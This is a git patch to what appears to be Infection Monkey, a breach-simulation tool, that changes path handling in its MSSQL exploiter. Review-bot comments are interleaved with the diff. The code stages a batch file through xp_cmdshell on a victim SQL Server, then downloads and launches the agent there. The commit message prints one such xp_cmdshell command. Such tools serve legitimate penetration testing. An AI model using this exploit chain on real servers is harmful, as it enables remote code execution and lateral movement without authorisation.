From ea980c4594fcab6011769feb56760396ce8ed962 Mon Sep 17 00:00:00 2001
From: Mike Salvatore
Date: Tue, 14 Jun 2022 11:32:54 -0400
Subject: [PATCH] Agent: Use PureWindowsPath in MSSQLExploiter

When using PurePath, Linux agents use the wrong path separator to build Windows paths. Windows corrects this, so there's no actual issue, but it's sloppy. Using PureWindowsPath objects creates the paths with the correct separators
Before: xp_cmdshell "NUL>%temp%\tmp_monkey_dir/tmp_monkey.bat"
After: xp_cmdshell "NUL>%temp%\tmp_monkey_dir\tmp_monkey.bat"
---
 monkey/infection_monkey/exploit/mssqlexec.py | 23 +++++++++-----------
 1 file changed, 10 insertions(+), 13 deletions(-)

diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py
index 453e875ca..4f9608acb 100644
--- a/monkey/infection_monkey/exploit/mssqlexec.py
+++ b/monkey/infection_monkey/exploit/mssqlexec.py
@@ -1,6 +1,5 @@
 import logging
-import os
-from pathlib import PurePath
+from pathlib import PureWindowsPath
 from time import sleep
 
 import pymssql
@@ -31,7 +30,7 @@ class MSSQLExploiter(HostExploiter):
     # Temporary file that saves commands for monkey's download and execution.
     TMP_FILE_NAME = "tmp_monkey.bat"
-    TMP_DIR_PATH = "%temp%\\tmp_monkey_dir"
+    TMP_DIR_PATH = PureWindowsPath("%temp%") / "tmp_monkey_dir"
     MAX_XP_CMDSHELL_COMMAND_SIZE = 12800
@@ -49,9 +48,7 @@ class MSSQLExploiter(HostExploiter):
         super().__init__()
         self.cursor = None
         self.agent_http_path = None
-        self.payload_file_path = os.path.join(
-            MSSQLExploiter.TMP_DIR_PATH, MSSQLExploiter.TMP_FILE_NAME
-        )
+        self.payload_file_path = MSSQLExploiter.TMP_DIR_PATH / MSSQLExploiter.TMP_FILE_NAME
 
     def _exploit_host(self) -> ExploiterResultData:
         """
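Review bot: `TMP_DIR_PATH` changes type from `str` to `PureWindowsPath` in the `@@ -31` hunk but gets no comment, while the sibling `TMP_FILE_NAME` line directly above it has one; a one-liner such as `# Staging directory for the payload file; a PureWindowsPath so Linux agents emit backslashes when it is str()'d` would record why a constructor call replaces the literal. The type change also means any remaining consumer that concatenates `TMP_DIR_PATH` with `+` would now raise `TypeError`, whereas `str.format` and f-strings keep working, so a quick grep of the other consumers (the temp-dir creation and removal commands are outside this hunk) is worthwhile. The `@@ -49` hunk derives `payload_file_path` from it, and the only visible consumer of that attribute already wraps it in `str()`.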
@@ -109,7 +106,7 @@ class MSSQLExploiter(HostExploiter):
         return self.exploit_result
 
     def run_payload_file(self):
-        file_running_command = MSSQLLimitedSizePayload(self.payload_file_path)
+        file_running_command = MSSQLLimitedSizePayload(str(self.payload_file_path))
         return self.run_mssql_command(file_running_command)
 
     def create_temp_dir(self):
@@ -133,7 +130,7 @@ class MSSQLExploiter(HostExploiter):
             raise Exception("Couldn't execute MSSQL exploiter because payload was too long")
         self.run_mssql_commands(array_of_commands)
 
-    def run_monkey(self, monkey_path_on_victim: PurePath):
+    def run_monkey(self, monkey_path_on_victim: PureWindowsPath):
         monkey_launch_command = self.get_monkey_launch_command(monkey_path_on_victim)
         logger.debug(
             f"Launching the agent: {monkey_launch_command.prefix} -- "
@@ -148,7 +145,7 @@ class MSSQLExploiter(HostExploiter):
         self.cursor.execute(cmd)
         sleep(MSSQLExploiter.QUERY_BUFFER)
 
-    def upload_monkey(self, monkey_path_on_victim: PurePath):
+    def upload_monkey(self, monkey_path_on_victim: PureWindowsPath):
         monkey_download_command = self.write_download_command_to_payload(monkey_path_on_victim)
         self.run_payload_file()
         self.add_executed_cmd(monkey_download_command.command)
@@ -164,7 +161,7 @@ class MSSQLExploiter(HostExploiter):
         )
         self.run_mssql_command(tmp_dir_removal_command)
 
-    def start_monkey_server(self, monkey_path_on_victim: PurePath) -> LockedHTTPServer:
+    def start_monkey_server(self, monkey_path_on_victim: PureWindowsPath) -> LockedHTTPServer:
         self.agent_http_path, http_thread = HTTPTools.create_locked_transfer(
             self.host, str(monkey_path_on_victim), self.agent_repository
         )
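Review bot: The new `str(self.payload_file_path)` in `run_payload_file` is unexplained at the call site and the method has no docstring, so a later cleanup could easily drop the conversion again; a trailing comment on the changed line, `# MSSQLLimitedSizePayload wants a str; payload_file_path is now a PureWindowsPath`, plus a one-line docstring `"""Execute the staged payload file on the victim via run_mssql_command."""` would pin the intent. That `MSSQLLimitedSizePayload` requires a `str` is inferred from the change itself; its definition is not in this diff.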
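Review bot: The annotation on `run_monkey` in the `@@ -133` hunk (and likewise on `upload_monkey`, `start_monkey_server`, `write_download_command_to_payload`, `get_monkey_launch_command` and `get_monkey_download_command` in the following hunks) now promises a `PureWindowsPath`, but nothing in this diff shows where `monkey_path_on_victim` is produced. If that producer still builds a `PurePath` on a Linux agent, `str(monkey_path_on_victim)` in `start_monkey_server` and `get_monkey_download_command` keeps emitting forward slashes, which is the same separator problem the commit message fixes for the payload path. Annotations are not enforced at runtime, so the hunk is documentation-only unless the caller of `run_monkey`/`upload_monkey` was also switched to `PureWindowsPath`; worth confirming, or stating the expectation in a docstring on `run_monkey`.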
@@ -175,12 +172,12 @@ class MSSQLExploiter(HostExploiter):
         http_thread.stop()
         http_thread.join(LONG_REQUEST_TIMEOUT)
 
-    def write_download_command_to_payload(self, monkey_path_on_victim: PurePath):
+    def write_download_command_to_payload(self, monkey_path_on_victim: PureWindowsPath):
         monkey_download_command = self.get_monkey_download_command(monkey_path_on_victim)
         self.run_mssql_command(monkey_download_command)
         return monkey_download_command
 
-    def get_monkey_launch_command(self, monkey_path_on_victim: PurePath):
+    def get_monkey_launch_command(self, monkey_path_on_victim: PureWindowsPath):
         # Form monkey's launch command
         monkey_args = build_monkey_commandline(
             self.host, self.current_depth - 1, monkey_path_on_victim
@@ -193,7 +190,7 @@ class MSSQLExploiter(HostExploiter):
             suffix=suffix,
         )
 
-    def get_monkey_download_command(self, monkey_path_on_victim: PurePath):
+    def get_monkey_download_command(self, monkey_path_on_victim: PureWindowsPath):
         monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.format(
             http_path=self.agent_http_path, dst_path=str(monkey_path_on_victim)
         )
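Review bot: `get_monkey_launch_command` hands `monkey_path_on_victim` to `build_monkey_commandline` as a path object, while the other call sites touched by this commit (`start_monkey_server`, `get_monkey_download_command`) convert with `str()` first; unless `build_monkey_commandline` is known to stringify its argument via `format`/f-string, this is the one place a `+`-style concatenation would fail with `TypeError`. Either `self.host, self.current_depth - 1, str(monkey_path_on_victim)` for consistency, or a comment on the call stating that `build_monkey_commandline` accepts path objects, would remove the asymmetry. Behaviour is not changed by this commit since the argument was already a `PurePath`, and `build_monkey_commandline` is defined outside this diff, so this is a consistency point only.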